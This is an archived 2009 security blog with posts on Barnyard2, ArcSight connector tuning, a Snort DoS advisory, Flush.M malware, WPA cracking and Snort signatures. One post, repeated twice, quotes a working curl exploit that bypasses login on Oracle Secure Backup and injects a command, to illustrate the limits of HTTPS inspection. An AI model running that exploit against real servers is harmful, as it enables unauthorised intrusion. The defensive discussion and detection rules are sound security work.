Sadly there are few who know about the excellent continuation of the original and stale but popular Barnyard code.
The great guys who manage Securix Live and NSM Now! Opensource projects have taken on updating and improving on the original Barnyard code.
Some of the new features are bug fixes, Unified2 support, support of Snort 2.8.5.1 and a slew of output plugins (mysql,postgres,syslog,cef,tcpdump,prelude,etc)
If you are a user of the old Barnyard code for high performance Snort log processing then I very highly recommend you give Barnyard2 a spin...
Download here:
http://www.securixlive.com/barnyard2/download.php
Monday, December 14, 2009
Wednesday, December 9, 2009
Arcsight Unified Windows Connector de-mystified
As I'm now full-time consulting for Arcsight , I figured this would be a good place to share some of the black magic knowledge that may help others be successful… A great first topic to jump into is the Windows Unified Connector.
This will require you to have some basic-advanced Arcsight administration experience but hopefully it's easy for anyone to understand.
Windows Unified is one of the heaviest utilized connectors but is also one of the most troublesome to understand. Hopefully this post will give you a better idea how it works and how to properly troubleshoot and tune it.
WHY:
Windows Event logs have a wealth of security information, especially on the domain controllers. Who logged on/off, who changed user or file permissions, etc.
HOW:
Windows Unified is a polling Connector which at regular intervals connects to each specified Windows Server, authenticates and grabs a copy of the latest event logs via WMI (Windows API) to normalize and forward to Arcsight ESM.
ISSUES:
Event Latency
There are several common issues experienced using the Windows Unified Connector. Perhaps the most prevalent is delayed events. It is possible to have a Windows Unified Connector sending events to ESM hours or even days late, obviously this kills your ability to do real-time correlation along with anything else really.
Limiting Connectors. A client recently had two separate connectors one production and one running remotely as backup both configured the same and actively polling the same Windows machines. This means the Windows hosts are getting hammered with double duty polling. It's a must to only poll from one Connector at a time and to obtain a backup site, simply add a new ESM destination from the production Connector to also forward events to the backup ESM. In your Disaster Recovery plan have a procedure for quickly turning up the Connector on the backup network to take over during a failure.
Device Profiling
The biggest offender of latency is grouping, the way the Unified Connector works, it polls all systems with the same frequency for the same number of events. This can lead to serious event delay and backlog if you are polling high event rate servers and low event rate servers on the same Connector.
Create multiple Unified Windows Connectors and group the high event rate systems on one or several Connectors and leave the low event rate systems on another. This is a key to eliminating event latency.
Finally there are a few knobs which allow you to tune both polling frequency and number of events fetched at a time.
eventpollcount=50
50 is the default but it would not hurt to bump this value up on your high event rate Connector.
sleeptime=-1
This value controls how long in seconds to wait until the next event poll. -1 the default means continuously poll without delay. On a slow network or polling over long WAN or VPN links, it makes since to add sleeptime, start with 20 seconds and work your way up until you find the right setting for your network.
Connection Issues
Windows Unified Conenctor uses CIFS connection via RPC TCP/445, make sure the RPC service is turned on and is not firewalled to or from the Unified Connector's IP.
Unable to open RPC Handler, if you see this in your Connector logs, it means the remote machine cannot be reached, it's down or authentication is failing. Start with ping, then telnet to port 445 from the Connector finally check login credentials.
Friday, November 20, 2009
Infosec Monkeys
Ran across this old gem of a post and wanted to archive it here as it's a classic.
From: Linus Torvalds torvalds@linux-foundation.org
Subject: Re: [stable] Linux 2.6.25.10
Newsgroups: gmane.linux.kernel
Date: 2008-07-15 16:13:03 GMT (1 year, 18 weeks, 1 day, 19 hours and 16 minutes ago)
On Tue, 15 Jul 2008, Linus Torvalds wrote:
>
> So as far as I'm concerned, "disclosing" is the fixing of the bug. It's
> the "look at the source" approach.
Btw, and you may not like this, since you are so focused on security, one
reason I refuse to bother with the whole security circus is that I think
it glorifies - and thus encourages - the wrong behavior.
It makes "heroes" out of security people, as if the people who don't just
fix normal bugs aren't as important.
In fact, all the boring normal bugs are _way_ more important, just because
there's a lot more of them. I don't think some spectacular security hole
should be glorified or cared about as being any more "special" than a
random spectacular crash due to bad locking.
Security people are often the black-and-white kind of people that I can't
stand. I think the OpenBSD crowd is a bunch of masturbating monkeys, in
that they make such a big deal about concentrating on security to the
point where they pretty much admit that nothing else matters to them.
To me, security is important. But it's no less important than everything
*else* that is also important!
Linus
Wednesday, November 4, 2009
The HTTPS security problem
Writing IDS and IPS signatures for web application targeted exploits is usually a straight forward process. Unfortunately as products attempt to be more secure via forcing SSL for transactions makes detection much more complex.
Take this recent exploit released on Milw0rm targeting Oracle Secure Backup Server for example...
It's a simple bash script using curl to post the malicious payload:
( snip )
TARGET=$1
#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`
if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi
echo "[+] I got a valid token: $session"
#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`
( /snip )
The issue is that the payload uri cannot be string matched using tradition IDS/IPS without either running Snort on the product itself or decoding SSL in realtime.
Well what if the product vendor (as most do) bundle a self signed certificate and don't give you access to the SSL keys to decrypt? What if your organization (as most do) simply ignore SSL streams with their IDS/IPS product.
This really hampers defense and raises the issues that HTTPS is going to be the primary target of attackers from now on to simply bypass prevention and detection all together.
How has your organization dealt with this issue? Have you even discussed it yet?
Snort has an SSL/TLS pre-processor but does it decode live SSL for you? It does not at all and only validates/inspects the SSL/TLS handshake and protocol and some basic attacks.
In fact from the current Snort documentation:
Encrypted traffic should be ignored by Snort for both performance reasons and to reduce false positives.
This is a problem the industry needs a real solution for.
Take this recent exploit released on Milw0rm targeting Oracle Secure Backup Server for example...
It's a simple bash script using curl to post the malicious payload:
( snip )
TARGET=$1
#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`
if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi
echo "[+] I got a valid token: $session"
#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`
( /snip )
The issue is that the payload uri cannot be string matched using tradition IDS/IPS without either running Snort on the product itself or decoding SSL in realtime.
Well what if the product vendor (as most do) bundle a self signed certificate and don't give you access to the SSL keys to decrypt? What if your organization (as most do) simply ignore SSL streams with their IDS/IPS product.
This really hampers defense and raises the issues that HTTPS is going to be the primary target of attackers from now on to simply bypass prevention and detection all together.
How has your organization dealt with this issue? Have you even discussed it yet?
Snort has an SSL/TLS pre-processor but does it decode live SSL for you? It does not at all and only validates/inspects the SSL/TLS handshake and protocol and some basic attacks.
In fact from the current Snort documentation:
Encrypted traffic should be ignored by Snort for both performance reasons and to reduce false positives.
This is a problem the industry needs a real solution for.
Thursday, October 22, 2009
Importing Known Malware IP's to Arcsight ESM
Wanted to share this proof of concept script I wrote to test out Arcsight's Common Event Format (CEF).
Essentially it grabs the latest list of known malware/bot IP's from SRI's Malware Threat Center and excellent resource for tracking malicious domains and spits them out to Arcsight via CEF Syslog.
Downloads:
malwarefeed.py
Labels:
Arcsight,
Botnet,
CEF,
Common Event Format,
Malware
Denial of Service vulnerability in Snort 2.8.1 - 2.8.5 beta
Advisory:
=========
Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify
Log:
====
30/06/2009 Bug detected.
20/07/2009 First mail with snort team.
20/07/2009 Snort team answer they will fix it in the next release (2.8.5).
16/09/2009 Snort release, bug fixed.
Affected Versions:
==================
snort-2.8.1
snort-2.8.2
snort-2.8.3
snort-2.8.4
snort-2.8.5.beta*
link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
poc: http://milw0rm.com/sploits/2009-snort-unified1_bug.tar.gz
=========
Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify
Log:
====
30/06/2009 Bug detected.
20/07/2009 First mail with snort team.
20/07/2009 Snort team answer they will fix it in the next release (2.8.5).
16/09/2009 Snort release, bug fixed.
Affected Versions:
==================
snort-2.8.1
snort-2.8.2
snort-2.8.3
snort-2.8.4
snort-2.8.5.beta*
link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
poc: http://milw0rm.com/sploits/2009-snort-unified1_bug.tar.gz
Monday, October 19, 2009
Securing LAMP video
Stumbled accross this screencast I made for my buddies at Firehost a couple of months back. Was my first screencast and didn't go so terrible :)
Goes over some of the basics for setting up a secure Ubuntu+Apache+PHP server...
Goes over some of the basics for setting up a secure Ubuntu+Apache+PHP server...
Tuesday, October 6, 2009
American Airlines now has in flight Wifi
American now has Wifi access on select planes, including 747 and MD-80's. Fees are $9.95 US for an all day pass and are currently running a free promotion for first time users.
The free promo requires registering an account using only an email address and code which they provide, no credit card is required. This means you can probably sign up using multiple email accounts and username for as long as the promo lasts.
When you sign up it assures you that the system is very secure and tested thoroughly by the FAA, the captive portal authentication is SSL based but after authenticating you are still vulnerable to any standard wireless man in the middle attack as there is no WEP, WPA or VPN protection.
Setting my radio to monitor mode quickly showed everyone's traffic on the flight, so security is non-existent at best.
Speeds were very good, similar to DSL connection but lots of intermittent latency made video streaming from Hulu unwatchable.
Here is a screen grab of an in-flight speed test.
The free promo requires registering an account using only an email address and code which they provide, no credit card is required. This means you can probably sign up using multiple email accounts and username for as long as the promo lasts.
When you sign up it assures you that the system is very secure and tested thoroughly by the FAA, the captive portal authentication is SSL based but after authenticating you are still vulnerable to any standard wireless man in the middle attack as there is no WEP, WPA or VPN protection.
Setting my radio to monitor mode quickly showed everyone's traffic on the flight, so security is non-existent at best.
Speeds were very good, similar to DSL connection but lots of intermittent latency made video streaming from Hulu unwatchable.
Here is a screen grab of an in-flight speed test.
Labels:
American Airlines,
sniffing,
Travel,
WIFI,
Wireless Security
Wednesday, September 30, 2009
9 Percent Of Enterprise Machines Infected With Malware
New study released from 3 months of botnet research found that up to 9% of large enterprise organizations are infected and active bot nodes.
This is not surprising and shows the importance of having both internal IDS sensors such as Snort IDS (with Emerging Threats Signature set) and a consolidated logging and event management product (SIEM tools) such as Arcsight.
A large client can leverage SIM to monitor windows event logs, host based ID(P)S and or anti-virus software. With the combined information, companies can leverage strong correlation reports matching those events with the internal IDS sensors. This seems to be a best practice approach at containing sprawling infections such as Conficker, Koobface and even the nasty Zeus (keylogging) malware.
Original article @ Dark Reading:
http://www.darkreading.com/insiderthreat/security/client/showArticle.jhtml?articleID=220200118
This is not surprising and shows the importance of having both internal IDS sensors such as Snort IDS (with Emerging Threats Signature set) and a consolidated logging and event management product (SIEM tools) such as Arcsight.
A large client can leverage SIM to monitor windows event logs, host based ID(P)S and or anti-virus software. With the combined information, companies can leverage strong correlation reports matching those events with the internal IDS sensors. This seems to be a best practice approach at containing sprawling infections such as Conficker, Koobface and even the nasty Zeus (keylogging) malware.
Original article @ Dark Reading:
http://www.darkreading.com/insiderthreat/security/client/showArticle.jhtml?articleID=220200118
Tuesday, September 15, 2009
Thursday, August 27, 2009
Apple's secret security updates
So with the release of OSX Snow Leopard on Friday Apple has included several new and almost lackluster features such as full 64bit applications, better multi-core support and the OpenCL library which will give CUDA like GPU access to applications. One of the most interesting new features which was slipped in secretly was transparent malware scanning.
This new OSX service scans all new files, emails and links that are processed for malcode using binary pattern matching signatures. This is interesting and great new feature for security but why is it a secret? Apparently Apple doesn't want to tarnish the reputation of running a Mac is a worry free utopia with no exploits, worms or trojans. While we do know that's not entirely true it's great they are integrating new security features to maintain that status.
Just odd that they didn't tell anyone.
Monday, July 27, 2009
Network Solutions hacked, 500,000 card numbers compromised
Another major data breach this time Network Solutions which offers security products such as SSL certificates is the latest to be compromised at the tune of 500,000+ credit/debit cards.
This attack seemed to be very sophisticated and the company claims the had maintained PCI compliance during the time of the hack. This is a huge one for the industry as it will spark a huge PCI works/doesn't work debate and it's perfectly timed as industry conferences BlackHat and Defcon start in Las Vegas this week.
References:
Washington Post
Finextra
SC Magazine
Labels:
Data Breach,
Hacked,
Hacking,
PCI Compliance,
PCI-DSS
Monday, July 6, 2009
New MS 0-day ActiveX (MSVidCtl dll exploit)
This was just announced this morning and was found in the wild on several Chinese forums. Apparently this has been rampant for almost a month undetected.
This is a client side (browser) exploit, so visiting a malicious site will result in infection.
There is one known hotfix and that is to set a "kill bit" in the registry for the ActiveX component.
* Create a registry key called:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
Then, create a dword value named "Compatibility Flags" and give it a value of 400.
Here are the current Snort IDS/IPS signatures for this exploit:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MSVidCtl 0-day"; flow: to_server, established; uricontent:"/aa/go.jpg"; nocase; classtype: attempted-admin; reference:URL,isc.sans.org/diary.html?storyid=6733; sid: 3000305; rev: 2;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
CURRENT_EVENTS Likely MSVIDCTL.dll exploit in transit";
flow:to_client,established; content:"|00 03 00 00 11 20 34|";
content:"|ff ff ff ff 0c 0c 0c 0c 00|"; within:70;
classtype:trojan-activity; sid:2009493; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
CURRENT_EVENTS Vulnerable Microsoft DirectShow ActiveX Load";
flow:to_client,established; content:"clsid"; nocase;
content:"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"; nocase;
reference:url,csis.dk/dk/nyheder/nyheder.asp?tekstID=799
classtype:web-application-attack; sid:2009xxx; rev:0;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
CURRENT_EVENTS Microsoft DirectShow ActiveX Exploit Attempt";
flow:to_client,established; content:"clsid"; nocase;
content:"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"; nocase; content:"omybro";
nocase; content:"logo.gif"; nocase;
reference:url,csis.dk/dk/nyheder/nyheder.asp?tekstID=799
classtype:web-application-attack; sid:2009xxx; rev:0;)
Tuesday, June 30, 2009
Kevin Mitnick's website hacked
Just blogged about infamous hacker Kevin Mitnick on Fireblog today and actually got him to make a statement for my article.
Check the article
And the original story
Moral of the story, not even hackers are safe from hackers :)
Labels:
DNS Flaw,
hackers,
kevin mitnick,
secure hosting
Wednesday, June 10, 2009
Exclusive interview with StrongWebMail's $10,000 hacker
If you haven't been living under a rock, you would of heard that webmail security company "StrongWebmail" issued a $10,000 hacking challenge to prove the security of their product. If any hacker could get into the CEO's email account and read the task list off his exchange calendar they would win $10,000. To make it even more exciting/rediculous he posted his username and password: CEO/Mustang85
The product works that any time an unauthorized person needs to access or change the password for an account it uses the phone system for two factor authentication with voice or txt message. Well Lance and co. wasn't challenged by any of that and relied on a simple XSS attack and some trickery to prove the prize was his.
Lance being an old friend of mine agreed to do an exclusive interview yesterday on FireBlog.com with all of the technical details and controversy.
The product works that any time an unauthorized person needs to access or change the password for an account it uses the phone system for two factor authentication with voice or txt message. Well Lance and co. wasn't challenged by any of that and relied on a simple XSS attack and some trickery to prove the prize was his.
Lance being an old friend of mine agreed to do an exclusive interview yesterday on FireBlog.com with all of the technical details and controversy.
Labels:
hacker,
hacking challenge,
lance james,
strongwebmail hack
Tuesday, June 9, 2009
LxLab's CEO commits suicide after software hack
Very sad to find out today that the CEO and developer of the software leading to the massive hosting provider hack I blogged about yesterday was found hanging in his home this morning.
http://www.theregister.co.uk/2009/06/09/lxlabs_funder_death/
Sad that someone was driven to suicide from such an event but showed the pride and personal dedication this man had in his software.
http://www.theregister.co.uk/2009/06/09/lxlabs_funder_death/
Sad that someone was driven to suicide from such an event but showed the pride and personal dedication this man had in his software.
Monday, June 8, 2009
VPS Hosting Vulnerability Leads to huge compromise
Article on the register today reports VPS hosting company LXLabs full customer base hacked due to vulnerability in their HyperVM VPS management application.
http://www.theregister.co.uk/2009/06/08/webhost_attack/
The main reason this was possible is HyperVM requires giving customers (the public) access to your Hypervisor OS (through the HyperVM web application).
FireHost recognizes these risks and made the decision in the beginning to not give any access to the hypervisor, in fact it runs on a completely out of band private network!
Any remote command to the hypervisor go through private VPN through an API which is limited to only basic features like stop, start, reload and rename VM. It's highly controlled and secure unlike HyperVM which ran directly ontop of the hypervisor.
Virtualization security is going to continue to be a hot topic and Firehost Inc. leads the way by providing true advanced security while sharing knowledge and best practices on our blog and security center.
http://www.theregister.co.uk/2009/06/08/webhost_attack/
The main reason this was possible is HyperVM requires giving customers (the public) access to your Hypervisor OS (through the HyperVM web application).
FireHost recognizes these risks and made the decision in the beginning to not give any access to the hypervisor, in fact it runs on a completely out of band private network!
Any remote command to the hypervisor go through private VPN through an API which is limited to only basic features like stop, start, reload and rename VM. It's highly controlled and secure unlike HyperVM which ran directly ontop of the hypervisor.
Virtualization security is going to continue to be a hot topic and Firehost Inc. leads the way by providing true advanced security while sharing knowledge and best practices on our blog and security center.
Labels:
0-day vulnerability,
FireHost,
Hacking,
HyperVM,
virtualization
Thursday, June 4, 2009
Wireless Keyboard Sniffing
New Free Open Source utility for sniffing keystrokes on a wireless keyboard! If you have heard my talks on RFID before you will remember that regardless how weak the signal is the guy with the big antenna always wins!
The tool is called Keykeriki and is available here:
http://www.remote-exploit.org/Keykeriki.html
The tool is called Keykeriki and is available here:
http://www.remote-exploit.org/Keykeriki.html
Keyboard Sniffer Keykeriki from Max Moser on Vimeo.
Labels:
open source,
password security,
sniffing,
wireless keyboard
Wednesday, May 20, 2009
Wireless inSecurity (WPA Owned)
So it has been no mystery that it's possible to break WPA and WPA2's Pre-Shared Key which is the default WPA security on most consumer grade access points. Because there is no direct weakness in the encryption protocol like WEP, it relied on brute force hash matching a process that can take a long time.
Wordlists considerably sped this process up making breaking WPA possible against dictionary PSK's in weeks/months as opposed to years. Why is this process so slow? WPA encrypts in multiple steps including salting the PSK hash with the SSID. So the password "dogthebountyhunter" would be SHA1 hash with the ssid or "DOG" as the salt. This adds unique randomness to make encryption breaking take longer.
Then two years ago group called "The Church of Wifi" released a set of rainbow tables (precomputed password hashes) for WPA security. The only issue is that it only covered the top 10 SSID names (default, linksys, NETGEAR, Belkin54g, etc) listed from http://Wigle.net/
So PCI DSS and an entire industry for years have been championing WPA and strong non-dictionary passwords for wireless safety, and it was generally considered secure, until now...
The biggest reasons WPA and most encryption are hard to break is that they are computationally difficult algorithms which simply take long time to guess. A standard modern processor say an Intel Core2Duo 2.5Ghz could brute-force crack WPA using methods above at around 600-700 PSK/s, well if there are a 500 million possible hashes to try it's going to take while (think lifetime).
Now graphics card developers namely Nvidia and ATI have been making super computers on a chip for a decade now, with simple, fast and highly parallel processors to make Counter Strike run smoothly as possible :) Recently something amazing happened, Nvidia released the CUDA API or programing library so the average Joe could write scripts and applications harnessing the power of their GPU for any type of computation, including encryption. The end result? WPA is broken:
Pyrit Source
Another movie
Wordlists considerably sped this process up making breaking WPA possible against dictionary PSK's in weeks/months as opposed to years. Why is this process so slow? WPA encrypts in multiple steps including salting the PSK hash with the SSID. So the password "dogthebountyhunter" would be SHA1 hash with the ssid or "DOG" as the salt. This adds unique randomness to make encryption breaking take longer.
Then two years ago group called "The Church of Wifi" released a set of rainbow tables (precomputed password hashes) for WPA security. The only issue is that it only covered the top 10 SSID names (default, linksys, NETGEAR, Belkin54g, etc) listed from http://Wigle.net/
So PCI DSS and an entire industry for years have been championing WPA and strong non-dictionary passwords for wireless safety, and it was generally considered secure, until now...
The biggest reasons WPA and most encryption are hard to break is that they are computationally difficult algorithms which simply take long time to guess. A standard modern processor say an Intel Core2Duo 2.5Ghz could brute-force crack WPA using methods above at around 600-700 PSK/s, well if there are a 500 million possible hashes to try it's going to take while (think lifetime).
Now graphics card developers namely Nvidia and ATI have been making super computers on a chip for a decade now, with simple, fast and highly parallel processors to make Counter Strike run smoothly as possible :) Recently something amazing happened, Nvidia released the CUDA API or programing library so the average Joe could write scripts and applications harnessing the power of their GPU for any type of computation, including encryption. The end result? WPA is broken:
Pyrit Source
Another movie
Monday, April 6, 2009
Oracle Weblogic IIS remote buffer overflow
I think this new Weblogic exploit found on milw0rm is particularly nasty as Weblogic is a java web-app framework used as the backend for some very large enterprises. Both for internal and external facing web applications, many which house millions of financial records and transactions. These types of exploits scare me in that they have the potential to lead to a huge financial data compromise...
Also brings to mind some interesting attack vectors for finding targets, my girlfriend works in sales for an IT services/recruiting firm just last week she was asking me what a Weblogic administrator was and how she was trying to find some consultants to fill a new project. I immediately thought of this new vulnerability and that an attacker, instead of traditional banner scanning for Weblogic they can simply pull up Monster.com and find the next fortune 1000 company to 0wn.
http://jobsearch.monster.com/Search.aspx?brd=1&q=weblogic
Scary stuff... anyways, pop in this signature I wrote this morning for Emerging Threats into your IDS/IPS and let me know if they are knocking on your door yet...
**** Updated sig to match vulnerability not exploit code...
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET EXPLOIT Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit"; flow:to_server,established; uricontent:".jsp?"; nocase; uricontent:"JSESSIONID="; nocase; isdataat:5132,relative; reference:cve,2008-5457; reference:url,infosec20.blogspot.com/2009/04/oracle-weblogic-iis-remote-buffer.html; reference:url,doc.emergingthreats.net/2009216; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Oracle; sid:2009216; rev:4;)
Labels:
BEA Weblogic,
Exploit,
IDS,
Oracle Weblogic,
Sentinel IPS,
Snort
Friday, April 3, 2009
Dude, Where's my Conficker?
With all the hoopla about Conficker, many of our customers are blowing up our inbox's wondering why they are not seeing Conficker related alerts on their Sentinel IPS?
Well congratulations to those customers, you have proper firewall rules in place, therefore Conficker cannot open up attacks to the MS08-067 vulnerability in Windows filesharing.
For those of you who are unsure, you have two easy possible solutions to barracade your front door from the thousands of daily Conficker attempts.
Firewall TCP port 445 inbound, or simply turn off Network Print/Filesharing on your Windows servers.
Also if you want to quickly sweep your internal network or DMZ for Conficker infections the latest version of Nmap can do the job in a snap! Just download the latest version and give this command a whirl:
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [mylanaddress]
That's it!
Well congratulations to those customers, you have proper firewall rules in place, therefore Conficker cannot open up attacks to the MS08-067 vulnerability in Windows filesharing.
For those of you who are unsure, you have two easy possible solutions to barracade your front door from the thousands of daily Conficker attempts.
Firewall TCP port 445 inbound, or simply turn off Network Print/Filesharing on your Windows servers.
Also if you want to quickly sweep your internal network or DMZ for Conficker infections the latest version of Nmap can do the job in a snap! Just download the latest version and give this command a whirl:
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [mylanaddress]
That's it!
Wednesday, March 18, 2009
Flush.M trojan and rising attack complexity
An updated version of DNS hijacking malware 'Flush.M' is currently out in the wild, it originally popped up in December 2008. What is significant about this particular nasty is the methodology of network compromise, it's sharply more complex and creative in the way it hijacks it's prey.
Let me walk you through how it works:
Joe the Plumber clicks through a website with a malicious banner ad hosting a Flush.M laden PDF using Adobe's latest JBIG2 security flaw, once his browser auto-opens the PDF, the trojan is successfully installed on his machine.
Now the interesting part, the malware starts a rogue DHCP server advertising to the local lan with a 1 hour refresh rate. This means that if Joe is at the public library, the one 'Flush.M' infection will change the network settings on all machines of the same LAN.
Because DHCP has the capability to set the client machine's DNS servers 'Flush.M' resets all DNS resolvers to malicious external DNS hosts which then exposes the entire LAN to a giant man in the middle attack. Phishing, password stealing, more malware injection, click fraud, you name it...
So for the first time I can think of you have malware not spreading on the LAN via attacking known vulnerabilities but from using legitimate networking technologies to poison the environment and very quickly compromise an entire LAN. Nasty stuff.
If you want to know if Flush.M is on your network, here is a snapshot of it phoning home:
14:45:26.989321 IP 172.17.1.86.60307 > 55.55.55.55.53: 45585+ A?
isatap.snip.edu. (33)
0x0000: 4500 003d 040c 0000 7f11 c4b3 ac11 0156 E..=...........V
0x0010: 4056 8533 eb93 0035 0029 42f8 b211 0100 @V.3...5.)B.....
0x0020: 0001 0000 0000 0000 0669 7361 7461 7004 .........isatap.
0x0030: 6963 6970 0365 6475 0000 0100 01 snip.edu.....
Snort signature (thanks jp):
alert udp ![$SMTP_SERVERS,$DNS_SERVERS] any -> $DNS_SERVERS 53
(msg:"Flush DNS lookup isatap (Possible flush)"; content:"|06|isatap";
nocase; classtype:trojan-activity; sid:1021339; rev:1;)
Let me walk you through how it works:
Joe the Plumber clicks through a website with a malicious banner ad hosting a Flush.M laden PDF using Adobe's latest JBIG2 security flaw, once his browser auto-opens the PDF, the trojan is successfully installed on his machine.
Now the interesting part, the malware starts a rogue DHCP server advertising to the local lan with a 1 hour refresh rate. This means that if Joe is at the public library, the one 'Flush.M' infection will change the network settings on all machines of the same LAN.
Because DHCP has the capability to set the client machine's DNS servers 'Flush.M' resets all DNS resolvers to malicious external DNS hosts which then exposes the entire LAN to a giant man in the middle attack. Phishing, password stealing, more malware injection, click fraud, you name it...
So for the first time I can think of you have malware not spreading on the LAN via attacking known vulnerabilities but from using legitimate networking technologies to poison the environment and very quickly compromise an entire LAN. Nasty stuff.
If you want to know if Flush.M is on your network, here is a snapshot of it phoning home:
14:45:26.989321 IP 172.17.1.86.60307 > 55.55.55.55.53: 45585+ A?
isatap.snip.edu. (33)
0x0000: 4500 003d 040c 0000 7f11 c4b3 ac11 0156 E..=...........V
0x0010: 4056 8533 eb93 0035 0029 42f8 b211 0100 @V.3...5.)B.....
0x0020: 0001 0000 0000 0000 0669 7361 7461 7004 .........isatap.
0x0030: 6963 6970 0365 6475 0000 0100 01 snip.edu.....
Snort signature (thanks jp):
alert udp ![$SMTP_SERVERS,$DNS_SERVERS] any -> $DNS_SERVERS 53
(msg:"Flush DNS lookup isatap (Possible flush)"; content:"|06|isatap";
nocase; classtype:trojan-activity; sid:1021339; rev:1;)
Monday, March 16, 2009
Network Security Appliance testing and QA with Virtualization
While working on our newest Intrusion Prevention appliance Sentinel IPS 4.0, we are always working to streamline and automate all testing. Unfortunately an inline bridged network device can be a challenge...
Here are some of the strategies that have worked in the past and some of the issues we are currently struggling with:
The old fashioned way (QA environment round 1):
What the team before I joined was using, 4 separate physical machines configured like this:
QA Attacker/Tester (loaded with stateful attack scripts) --> Router (192.168.x.x <-> 10.10.x.x) <--> Sentinel IPS (inline bridged appliance) <--> Switch <--> QA Target Host/s
This works but is in my mind too much equipment and software to maintain, not only that but power consumption is in microwave oven levels. Adding a new attacker or target platform requires loading or reloading another piece of hardware.
QA environment round 2:
Hello Vmware! I believe it was VMware Workstation for Windows 5.x or so which added a wonderful new network feature called "teaming" in which you could create virtual labs by daisy chaining VM's and virtual interfaces together allowing Vmware to handle all of the routing.
Here is how it worked (QA Team1):
Attacker VM (Gentoo) <-bridged interface0-> Sentinel IPS VM <-Nat interface1-> Target VM1 (Windows Server 2000) Target VM2 (CentOS 5.x)
So you simply assign all of the VM's to a single team and the one interface each to your network appliance so it will bridge the traffic from your Attacker/Tester VM to the Internal target VM's. With one command you can start and stop the entire team or add and modify the attacker and target OS's. Adding Backtrack LiveCD as one of the attacker's is easy, simply install their VM and add it into the team using the bridged interface.
Now to avoid confusion there are two bridges in action, one which bridges the attacker and network appliance (Sentinel IPS in my case) to your normal physical LAN. This is chosen automatically by VMware but if you are on a laptop which may switch between wireless and wired networks you will want to manually create a bridged interface for your wireless card. They make it dead simple to switch your team interfaces around when your not on wireless.
The second bridge is the network appliance itself! If it is an inline bridge device like our IPS, then it will bridge the already bridged interface to the private NAT network which VMware created automatically. The auto NAT network is usually some derivative of 192.168.1xx.x which likely won't clobber your normal LAN.
Ok... so that seems like the perfect setup and it has worked rock solid for us requiring only one Windows machine with VMware, one actual real network interface and 2+ gig's of RAM. Pretty easy to come by these days.
Why do we want a new setup? Well I had to splurge on a Macbook Pro last year and VMware fusion does not support teaming.... Seem like small potatoes but it kills me that I can't put my 4 gigs or ram to good use. Yes my drive is encrypted :)
*** Update: maybe time to try Convirt 1.0 on my Mac
Here are some of the strategies that have worked in the past and some of the issues we are currently struggling with:
The old fashioned way (QA environment round 1):
What the team before I joined was using, 4 separate physical machines configured like this:
QA Attacker/Tester (loaded with stateful attack scripts) --> Router (192.168.x.x <-> 10.10.x.x) <--> Sentinel IPS (inline bridged appliance) <--> Switch <--> QA Target Host/s
This works but is in my mind too much equipment and software to maintain, not only that but power consumption is in microwave oven levels. Adding a new attacker or target platform requires loading or reloading another piece of hardware.
QA environment round 2:
Hello Vmware! I believe it was VMware Workstation for Windows 5.x or so which added a wonderful new network feature called "teaming" in which you could create virtual labs by daisy chaining VM's and virtual interfaces together allowing Vmware to handle all of the routing.
Here is how it worked (QA Team1):
Attacker VM (Gentoo) <-bridged interface0-> Sentinel IPS VM <-Nat interface1-> Target VM1 (Windows Server 2000) Target VM2 (CentOS 5.x)
So you simply assign all of the VM's to a single team and the one interface each to your network appliance so it will bridge the traffic from your Attacker/Tester VM to the Internal target VM's. With one command you can start and stop the entire team or add and modify the attacker and target OS's. Adding Backtrack LiveCD as one of the attacker's is easy, simply install their VM and add it into the team using the bridged interface.
Now to avoid confusion there are two bridges in action, one which bridges the attacker and network appliance (Sentinel IPS in my case) to your normal physical LAN. This is chosen automatically by VMware but if you are on a laptop which may switch between wireless and wired networks you will want to manually create a bridged interface for your wireless card. They make it dead simple to switch your team interfaces around when your not on wireless.
